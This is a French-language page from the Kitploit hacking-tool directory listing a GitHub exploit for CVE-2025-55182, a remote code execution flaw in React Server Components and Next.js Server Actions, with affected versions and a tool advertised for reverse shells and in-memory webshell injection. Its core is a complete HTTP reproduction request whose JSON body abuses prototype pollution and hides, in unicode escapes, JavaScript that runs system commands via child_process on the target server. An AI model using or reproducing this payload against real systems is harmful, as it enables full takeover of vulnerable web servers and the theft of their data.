Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/bbd-yzz/cve-2025-55182
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubbbd-yzz/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 (exécution de commandes, shell inversé, injection de cheval de mémoire)

Voir le dépôt
3il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182

CVE-2025-55182

Vulnérabilité d’exécution de code à distance dans React Server Components (CVE-2025-55182) et dans Next.js (CVE-2025-66478). Cette vulnérabilité affecte principalement la fonctionnalité Server Actions de react-server-dom-webpack. En raison de l’absence de validation de sécurité lors de l’analyse des formulaires soumis par le client, un attaquant peut, en forgeant une requête de formulaire malveillante, appeler directement les modules intégrés de Node.js, exécuter des commandes système arbitraires sur le serveur, lire et écrire des fichiers, voire prendre complètement le contrôle du service. Par ailleurs, Next.js versions 15.x et 16.x, lorsqu’elles utilisent App Router, dépendent d’un paquet React côté serveur défectueux, ce qui permet également à un attaquant d’injecter du code malveillant pour exécuter des commandes à distance.

Versions concernées

root@kitploit:~
React version concernée == 19.0.0
React version concernée == 19.0.1
React version concernée == 19.1.0
React version concernée == 19.2.0
react-server-dom-webpack package version concernée == 19.0.0、19.0.1、19.1.0、19.1.1、19.2.0
react-server-dom-parcel package version concernée == 19.0.0、19.0.1、19.1.0、19.1.1、19.2.0
react-server-dom-turbopack package version concernée == 19.0.0、19.0.1、19.1.0、19.1.1、19.2.0
Next.js version concernée >= 14.3.0-canary.77
Next.js 15.0.0 <= version concernée < 15.0.5
Next.js 15.1.0 <= version concernée < 15.1.9
Next.js 15.2.0 <= version concernée < 15.2.6
Next.js 15.3.0 <= version concernée < 15.3.6
Next.js 15.4.0 <= version concernée < 15.4.8
Next.js 15.5.0 <= version concernée < 15.5.7
Next.js 16.0.0 <= version concernée < 16.0.7
Dify 1.1.2 <= version concernée < 1.10.1-fix.1

Captures d’écran de l’outil

Figure 1 Figure 2 Figure 3 Figure 4

Paquet de reproduction

root@kitploit:~
POST /c9436a490867 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 1755
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Next-Action: x
Connection: close

--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"\u0074\u0072\u0079\u0020\u007b\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0073\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u002e\u006d\u0061\u0069\u006e\u004d\u006f\u0064\u0075\u006c\u0065\u002e\u0072\u0065\u0071\u0075\u0069\u0072\u0065\u0028\u0027\u0063\u0068\u0069\u006c\u0064\u005f\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u0027\u0029\u002e\u0065\u0078\u0065\u0063\u0053\u0079\u006e\u0063\u0028\u0027\u0065\u0063\u0068\u006f\u0020\u0051\u0041\u0058\u004e\u0042\u0031\u0032\u0031\u0033\u0038\u0027\u0029\u002e\u0074\u006f\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0027\u0062\u0061\u0073\u0065\u0036\u0034\u0027\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u0020\u007b\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0073\u0020\u003d\u0020\u0027\u0045\u0052\u0052\u004f\u0052\u0027\u003b\u0020\u007d\u0020\u0074\u0068\u0072\u006f\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u002e\u0061\u0073\u0073\u0069\u0067\u006e\u0028\u006e\u0065\u0077\u0020\u0045\u0072\u0072\u006f\u0072\u0028\u0027\u0078\u0027\u0029\u002c\u007b\u0064\u0069\u0067\u0065\u0073\u0074\u003a\u0072\u0065\u0073\u007d\u0029\u003b","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="1"

"$@0"
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd
Content-Disposition: form-data; name="2"

[]
--c1dda57f91fbe592e349f3cee2598d970a8089d499e0d896d10cf19752613ddd--
Télécharger l’outil